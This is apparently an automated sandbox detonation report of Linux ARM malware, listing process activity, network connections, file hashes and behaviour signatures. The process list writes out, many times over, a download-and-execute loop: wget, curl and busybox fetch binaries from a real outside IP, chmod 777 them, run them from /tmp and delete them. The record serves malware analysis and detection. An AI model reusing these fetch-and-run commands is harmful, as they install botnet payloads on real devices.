/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| US | 151.101.193.91:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 89.187.167.8:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 01:01
Reported
2024-10-29 01:04
Platform
debian9-armhf-20240611-en
Max time kernel
65s
Max time network
70s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
